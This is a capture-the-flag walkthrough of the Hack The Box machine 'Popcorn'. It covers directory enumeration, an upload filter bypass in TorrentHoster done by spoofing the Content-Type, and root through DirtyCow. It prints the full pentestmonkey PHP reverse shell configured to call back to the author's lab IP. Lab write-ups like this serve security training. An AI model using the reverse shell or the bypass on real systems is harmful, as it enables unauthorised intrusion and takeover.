Hack The Box

HackTheBox “Popcorn” Walkthrough

Popcorn, a medium-level Linux OS machine on HackTheBox, through meticulous enumeration, we stumbled upon an instance of TorrentHoster, which allowed us to upload an image which is actually a reverse shell payload and…

Popcorn, a medium-level Linux OS machine on HackTheBox, through meticulous enumeration, we stumbled upon an instance of TorrentHoster, which allowed us to upload an image which is actually a reverse shell payload and bypass its filtering mechanisms, granting us the crucial initial foothold with a user-level shell. Then, we exploited a system vulnerability utilizing the DirtyCow exploit, ultimately securing a coveted root shell.

HackTheBox “Popcorn” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

HackTheBox “Popcorn” Walkthrough, figure 2

Visit the target at port 80.

HackTheBox “Popcorn” Walkthrough, figure 3

Nothing interesting, so, the subsequent action involves executing a Feroxbuster scan to identify concealed files or directories:

└─$ sudo feroxbuster -u http://10.10.10.6 -X 404,403    ___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.10.0───────────────────────────┬────────────────────── 🎯  Target Url            │ http://10.10.10.6 🚀  Threads               │ 50 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌  Status Codes          │ All Status Codes! 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.10.0 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 💢  Regex Filter          │ 404 💢  Regex Filter          │ 403 🔎  Extract Links         │ true 🏁  HTTP methods          │ [GET] 🔃  Recursion Depth       │ 4───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────403      GET       10l       30w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter200      GET        4l       25w      177c http://10.10.10.6/200      GET        4l       25w      177c http://10.10.10.6/index200      GET      652l     3096w    47101c http://10.10.10.6/test.php200      GET      654l     3106w    47232c http://10.10.10.6/test301      GET        9l       28w      310c http://10.10.10.6/torrent => http://10.10.10.6/torrent/200      GET        0l        0w        0c http://10.10.10.6/torrent/download200      GET        1l       11w      182c http://10.10.10.6/torrent/logout301      GET        9l       28w      313c http://10.10.10.6/torrent/js => http://10.10.10.6/torrent/js/200      GET        6l       14w      321c http://10.10.10.6/torrent/stylesheet.css200      GET        0l        0w        0c http://10.10.10.6/torrent/config200      GET      104l      237w     2054c http://10.10.10.6/torrent/css/lightbox.css301      GET        9l       28w      314c http://10.10.10.6/torrent/lib => http://10.10.10.6/torrent/lib/200      GET       45l      266w     2152c http://10.10.10.6/torrent/js/scriptaculous.js301      GET        9l       28w      317c http://10.10.10.6/torrent/upload => http://10.10.10.6/torrent/upload/200      GET        2l        0w        4c http://10.10.10.6/torrent/secure200      GET        0l        0w        0c http://10.10.10.6/torrent/lib/dblib.php200      GET        0l        0w        0c http://10.10.10.6/torrent/lib/stdlib.php200      GET        0l        0w        0c http://10.10.10.6/torrent/lib/BDecode.php200      GET        0l        0w        0c http://10.10.10.6/torrent/lib/webtorrent.php200      GET        0l        0w        0c http://10.10.10.6/torrent/lib/getscrape.php200      GET        0l        0w        0c http://10.10.10.6/torrent/lib/BEncode.php301      GET        9l       28w      316c http://10.10.10.6/torrent/users => http://10.10.10.6/torrent/users/200      GET      903l     2738w    31969c http://10.10.10.6/torrent/js/effects.js200      GET      689l     1962w    20711c http://10.10.10.6/torrent/js/lightbox.js200      GET     1785l     4607w    47603c http://10.10.10.6/torrent/js/prototype.js200      GET      117l      857w    83698c http://10.10.10.6/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.jpg200      GET      172l     1672w    95315c http://10.10.10.6/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.png200      GET      118l      741w    60101c http://10.10.10.6/torrent/upload/noss.png200      GET      293l      882w    11366c http://10.10.10.6/torrent/index200      GET      138l      809w    51153c http://10.10.10.6/torrent/preview200      GET        0l        0w        0c http://10.10.10.6/torrent/edit200      GET       18l      109w     6455c http://10.10.10.6/torrent/images/link-forum.png200      GET       10l       51w     4166c http://10.10.10.6/torrent/images/link-home.png200      GET        2l        6w      371c http://10.10.10.6/torrent/images/close.gif200      GET        6l       17w      946c http://10.10.10.6/torrent/images/leftcor.png200      GET        7l       39w     3737c http://10.10.10.6/torrent/images/login2.jpg200      GET        1l        5w       77c http://10.10.10.6/torrent/images/reg.gif200      GET       10l       25w     2538c http://10.10.10.6/torrent/images/search.jpg200      GET       11l       58w     4049c http://10.10.10.6/torrent/images/link-upload.png200      GET        3l       13w     1627c http://10.10.10.6/torrent/images/details.png200      GET       24l       98w     3885c http://10.10.10.6/torrent/images/loading.gif200      GET       11l       73w     5552c http://10.10.10.6/torrent/images/statics.jpg200      GET        1l        2w      127c http://10.10.10.6/torrent/images/sidebarspace.gif200      GET        1l        1w      121c http://10.10.10.6/torrent/images/background.gif200      GET       10l       44w     3861c http://10.10.10.6/torrent/images/link-stats.png200      GET       10l       45w     3361c http://10.10.10.6/torrent/images/seeds.jpg200      GET        8l       48w     4023c http://10.10.10.6/torrent/images/link-browse.png200      GET       18l      137w     6625c http://10.10.10.6/torrent/images/register%20user.gif200      GET        6l       26w     2087c http://10.10.10.6/torrent/images/th.png200      GET        4l       18w     1896c http://10.10.10.6/torrent/images/folder.png200      GET        5l       12w      732c http://10.10.10.6/torrent/images/login2.gif200      GET        8l       30w     2495c http://10.10.10.6/torrent/images/rightcor.png200      GET       22l       65w     4944c http://10.10.10.6/torrent/images/files%20screenshot.jpg200      GET       11l       47w     4799c http://10.10.10.6/torrent/images/green%20mark.jpg200      GET       13l       65w     5137c http://10.10.10.6/torrent/images/edit.jpg200      GET       62l      328w    25091c http://10.10.10.6/torrent/images/feed2.png200      GET       55l      314w    23001c http://10.10.10.6/torrent/images/stats.png200      GET       66l      389w    34759c http://10.10.10.6/torrent/images/banner.jpg200      GET       92l      609w    56889c http://10.10.10.6/torrent/images/button.png200      GET       87l      629w    58643c http://10.10.10.6/torrent/images/login.png301      GET        9l       28w      317c http://10.10.10.6/torrent/images => http://10.10.10.6/torrent/images/301      GET        9l       28w      316c http://10.10.10.6/torrent/admin => http://10.10.10.6/torrent/admin/301      GET        9l       28w      320c http://10.10.10.6/torrent/templates => http://10.10.10.6/torrent/templates/200      GET       16l       92w      936c http://10.10.10.6/torrent/comment200      GET       99l      667w    64670c http://10.10.10.6/torrent/images/updatestats.png301      GET        9l       28w      314c http://10.10.10.6/torrent/css => http://10.10.10.6/torrent/css/200      GET       87l      652w    64417c http://10.10.10.6/torrent/images/mytorrents.png200      GET       81l      600w    61018c http://10.10.10.6/torrent/images/logout.png200      GET        1l        0w        1c http://10.10.10.6/torrent/templates/form_header.php200      GET        5l       13w       98c http://10.10.10.6/torrent/templates/insufficient_privileges.php200      GET       37l       83w     1111c http://10.10.10.6/torrent/templates/torrents_list_date.php302      GET        0l        0w        0c http://10.10.10.6/torrent/templates/modify.php => ../../index.php301      GET        9l       28w      317c http://10.10.10.6/torrent/health => http://10.10.10.6/torrent/health/200      GET        5l       28w      247c http://10.10.10.6/torrent/templates/directory.php200      GET        2l       15w      153c http://10.10.10.6/torrent/templates/torrent_details.php200      GET        4l       17w      161c http://10.10.10.6/torrent/templates/news2.php200      GET        3l       15w      153c http://10.10.10.6/torrent/templates/torrents_list.php200      GET        3l        5w      180c http://10.10.10.6/torrent/health/2.gif200      GET        3l        4w      171c http://10.10.10.6/torrent/health/1.gif200      GET        4l        6w      195c http://10.10.10.6/torrent/health/3.gif200      GET        3l        4w      211c http://10.10.10.6/torrent/health/5.gif200      GET        3l        4w      199c http://10.10.10.6/torrent/health/4.gif301      GET        9l       28w      323c http://10.10.10.6/torrent/admin/images => http://10.10.10.6/torrent/admin/images/200      GET        4l       33w     1775c http://10.10.10.6/torrent/admin/images/files%20management.gif200      GET       11l       24w     1814c http://10.10.10.6/torrent/admin/images/users%20management.gif200      GET       10l       47w     3170c http://10.10.10.6/torrent/admin/images/add%20subcategories.jpg200      GET       12l       32w     2978c http://10.10.10.6/torrent/admin/images/browse.jpg200      GET       13l       45w     4116c http://10.10.10.6/torrent/admin/images/comments.jpg200      GET       12l       39w     2775c http://10.10.10.6/torrent/admin/images/ban%20users.jpg200      GET        9l       55w     4052c http://10.10.10.6/torrent/admin/images/logout.png200      GET       17l       55w     4152c http://10.10.10.6/torrent/admin/images/list%20torrents.jpg200      GET       12l       39w     4100c http://10.10.10.6/torrent/admin/images/edit%20news.jpg200      GET        8l       47w     3301c http://10.10.10.6/torrent/admin/images/hack.jpg200      GET        7l       29w     3224c http://10.10.10.6/torrent/admin/images/users.jpg200      GET        8l       35w     3745c http://10.10.10.6/torrent/admin/images/add%20news.jpg200      GET        7l       35w     1828c http://10.10.10.6/torrent/admin/images/news%20management.gif200      GET        9l       51w     4132c http://10.10.10.6/torrent/admin/images/list%20categories.jpg301      GET        9l       28w      319c http://10.10.10.6/torrent/database => http://10.10.10.6/torrent/database/200      GET        3l        9w      483c http://10.10.10.6/torrent/images/top-bg.jpg200      GET       13l       61w     5012c http://10.10.10.6/torrent/admin/images/users.png200      GET        9l       61w     4944c http://10.10.10.6/torrent/admin/images/dead%20torrents.jpg200      GET      230l     1247w     9821c http://10.10.10.6/torrent/database/th_database.sql200      GET      227l      489w     8373c http://10.10.10.6/torrent/login200      GET        1l        4w       80c http://10.10.10.6/torrent/admin/users200      GET        6l        9w      443c http://10.10.10.6/torrent/images/orange%20bg.jpg200      GET      185l      476w     9280c http://10.10.10.6/torrent/browse200      GET       12l       47w     3408c http://10.10.10.6/torrent/images/news-arrow.gif200      GET        5l       25w     1617c http://10.10.10.6/torrent/images/feed.png200      GET        7l       36w     1886c http://10.10.10.6/torrent/images/download.png200      GET        7l       40w     2617c http://10.10.10.6/torrent/images/back.gif200      GET        1l        6w       96c http://10.10.10.6/torrent/images/regb.gif200      GET       21l      112w     8368c http://10.10.10.6/torrent/images/logo.png200      GET        6l       18w     1130c http://10.10.10.6/torrent/users/img301      GET        9l       28w      326c http://10.10.10.6/torrent/users/templates => http://10.10.10.6/torrent/users/templates/200      GET       13l       66w     4332c http://10.10.10.6/torrent/images/control%20panel.gif200      GET        6l       27w      295c http://10.10.10.6/torrent/users/templates/change_settings_form.php200      GET       20l       63w      629c http://10.10.10.6/torrent/users/templates/signup_form.php200      GET        4l       17w      107c http://10.10.10.6/torrent/users/templates/forgot_password_success.php200      GET       23l       96w      787c http://10.10.10.6/torrent/users/templates/forgot_password_form.php200      GET        3l        8w      449c http://10.10.10.6/torrent/images/top-end.jpg200      GET        5l       11w      440c http://10.10.10.6/torrent/images/button-bg.jpg200      GET        2l       14w      674c http://10.10.10.6/torrent/images/page_bg.jpg200      GET       12l       78w     5360c http://10.10.10.6/torrent/images/link-news.png200      GET        1l        4w       80c http://10.10.10.6/torrent/users/index200      GET        6l       14w      321c http://10.10.10.6/torrent/stylesheet200      GET       87l      622w    60051c http://10.10.10.6/torrent/images/admin.png200      GET        3l       25w     1670c http://10.10.10.6/torrent/images/closelabel.gif200      GET       10l       59w     4133c http://10.10.10.6/torrent/images/link-development.png200      GET       88l      634w    62088c http://10.10.10.6/torrent/images/register.png200      GET        1l        4w       80c http://10.10.10.6/torrent/admin/index200      GET       17l       70w     4429c http://10.10.10.6/torrent/images/link-faq.png301      GET        9l       28w      319c http://10.10.10.6/torrent/torrents => http://10.10.10.6/torrent/torrents/200      GET        1l        1w       55c http://10.10.10.6/torrent/images/blank.gif200      GET        6l       34w     3691c http://10.10.10.6/torrent/images/download%20details.jpg200      GET        8l       24w     2155c http://10.10.10.6/torrent/images/folder2.png200      GET       11l       68w     6491c http://10.10.10.6/torrent/images/globe.jpg200      GET       19l       88w     7594c http://10.10.10.6/torrent/images/link-about.png200      GET        0l        0w        0c http://10.10.10.6/torrent/torrents/index200      GET       11l       50w     3064c http://10.10.10.6/torrent/thumbnail200      GET        2l       16w      163c http://10.10.10.6/torrent/users/templates/registration_success.php200      GET        2l       18w      174c http://10.10.10.6/torrent/users/templates/users_menu.php200      GET        7l       28w      331c http://10.10.10.6/torrent/users/templates/change_password_form.php200      GET      237l      482w     8181c http://10.10.10.6/torrent/users/registration200      GET      134l      306w     3767c http://10.10.10.6/torrent/hide301      GET        9l       28w      317c http://10.10.10.6/torrent/readme => http://10.10.10.6/torrent/readme/200      GET       38l      246w     3412c http://10.10.10.6/torrent/readme/readme.html200      GET      215l      474w     7915c http://10.10.10.6/torrent/users/forgot_password301      GET        9l       28w      309c http://10.10.10.6/rename => http://10.10.10.6/rename/200      GET        1l        4w       95c http://10.10.10.6/rename/index200      GET        0l        0w        0c http://10.10.10.6/torrent/upload_file200      GET        0l        0w        0c http://10.10.10.6/torrent/validator200      GET        1l        4w       80c http://10.10.10.6/torrent/users/change_password301      GET        9l       28w      314c http://10.10.10.6/torrent/PNG => http://10.10.10.6/torrent/PNG/200      GET      782l     5541w   485764c http://10.10.10.6/torrent/PNG/banner.png[####################] - 3m    180276/180276  0s      found:154     errors:2521   [####################] - 3m     30000/30000   174/s   http://10.10.10.6/ [####################] - 3m     30000/30000   167/s   http://10.10.10.6/torrent/ [####################] - 11s    30000/30000   2739/s  http://10.10.10.6/torrent/images/ => Directory listing[####################] - 3m     30000/30000   161/s   http://10.10.10.6/torrent/admin/ [####################] - 12s    30000/30000   2464/s  http://10.10.10.6/torrent/templates/ => Directory listing[####################] - 1s     30000/30000   34562/s http://10.10.10.6/torrent/js/ => Directory listing[####################] - 0s     30000/30000   114068/s http://10.10.10.6/torrent/css/ => Directory listing[####################] - 7s     30000/30000   4324/s  http://10.10.10.6/torrent/lib/ => Directory listing[####################] - 1s     30000/30000   29268/s http://10.10.10.6/torrent/upload/ => Directory listing[####################] - 3m     30000/30000   169/s   http://10.10.10.6/torrent/users/ [####################] - 0s     30000/30000   95541/s http://10.10.10.6/torrent/health/ => Directory listing[####################] - 7s     30000/30000   4198/s  http://10.10.10.6/torrent/admin/images/ => Directory listing[####################] - 0s     30000/30000   73529/s http://10.10.10.6/torrent/database/ => Directory listing[####################] - 7s     30000/30000   4368/s  http://10.10.10.6/torrent/users/templates/ => Directory listing[####################] - 3m     30000/30000   170/s   http://10.10.10.6/torrent/torrents/ [####################] - 7s     30000/30000   4214/s  http://10.10.10.6/torrent/readme/ => Directory listing[####################] - 3m     30000/30000   188/s   http://10.10.10.6/rename/ [####################] - 5s     30000/30000   5829/s  http://10.10.10.6/torrent/PNG/ => Directory listing

Checking /test directory, we can see that file uploads functionality is allowed.

HackTheBox “Popcorn” Walkthrough, figure 4

Let’s have a look at the /torrent directory.

HackTheBox “Popcorn” Walkthrough, figure 5

We are required to have an account to be able to upload files.

HackTheBox “Popcorn” Walkthrough, figure 6

Now, we have an account.

HackTheBox “Popcorn” Walkthrough, figure 7

Checking the upload option.

HackTheBox “Popcorn” Walkthrough, figure 8

Download a sample torrent file from here and upload it.

HackTheBox “Popcorn” Walkthrough, figure 9

After successfully uploading the torrent file, we are redirected to the following page. From there, we just click on the “Edit this torrent” option.

HackTheBox “Popcorn” Walkthrough, figure 10

Exploitation:

Upon encountering another window featuring an upload option for updating a screenshot, we promptly run Burp Suite and then download the reverse shell PHP file from here. Subsequently, we edited the IP and port information within the PHP payload, as illustrated below.

<?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only.  Users take full responsibility// for any actions performed using this tool.  The author accepts no liability// for damage caused by this tool.  If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only.  Users take full responsibility// for any actions performed using this tool.  If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '10.10.14.8';  // CHANGE THIS$port = 4343;       // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies.  Worth a try...if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork();  if ($pid == -1) {  printit("ERROR: Can't fork");  exit(1); }  if ($pid) {  exit(0);  // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) {  printit("Error: Can't setsid()");  exit(1); } $daemon = 1;} else { printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { printit("$errstr ($errno)"); exit(1);}// Spawn shell process$descriptorspec = array(   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to   2 => array("pipe", "w")   // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) { // Check for end of TCP connection if (feof($sock)) {  printit("ERROR: Shell connection terminated");  break; } // Check for end of STDOUT if (feof($pipes[1])) {  printit("ERROR: Shell process terminated");  break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) {  if ($debug) printit("SOCK READ");  $input = fread($sock, $chunk_size);  if ($debug) printit("SOCK: $input");  fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) {  if ($debug) printit("STDOUT READ");  $input = fread($pipes[1], $chunk_size);  if ($debug) printit("STDOUT: $input");  fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) {  if ($debug) printit("STDERR READ");  $input = fread($pipes[2], $chunk_size);  if ($debug) printit("STDERR: $input");  fwrite($sock, $input); }}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) { if (!$daemon) {  print "$string\n"; }}?>

Now, browse for the php payload file.

HackTheBox “Popcorn” Walkthrough, figure 11

While Burp Suite is running, we intercept the “Submit Screenshot” request.

HackTheBox “Popcorn” Walkthrough, figure 12

We edit the content type of the intercepted request to be image/png.

HackTheBox “Popcorn” Walkthrough, figure 13

Forward.

HackTheBox “Popcorn” Walkthrough, figure 14

Php payload is uploaded.

HackTheBox “Popcorn” Walkthrough, figure 15

From the results of the Feroxbuster scan, we have the following directory http://10.10.10.6/torrent/upload/

HackTheBox “Popcorn” Walkthrough, figure 16

Excellent news! Our file upload has been successful. Let’s start a listener according to our php payload.

HackTheBox “Popcorn” Walkthrough, figure 17

Now, we click on the recently modified file in the uploaded content which has a php extension.

HackTheBox “Popcorn” Walkthrough, figure 18

Et voilà, we now have a user-level shell.

Privilege Escalation:

Let’s have a look at the machine.

HackTheBox “Popcorn” Walkthrough, figure 19

With a quick online/searchspoit reserch, we can see that this box could be vulnerable to DirtyCow exploit 2016–5195.

Let’s download it and start an HTTP server.

HackTheBox “Popcorn” Walkthrough, figure 20

Download the exploit on the target machine and compile it.

HackTheBox “Popcorn” Walkthrough, figure 21

We are asked for the password of the firefart user profile that will be set by the exploit.

And after a minute.

HackTheBox “Popcorn” Walkthrough, figure 22

We switch to firefart user profile, put the password, and BOOM! we get a root privileges shell.

Cheers.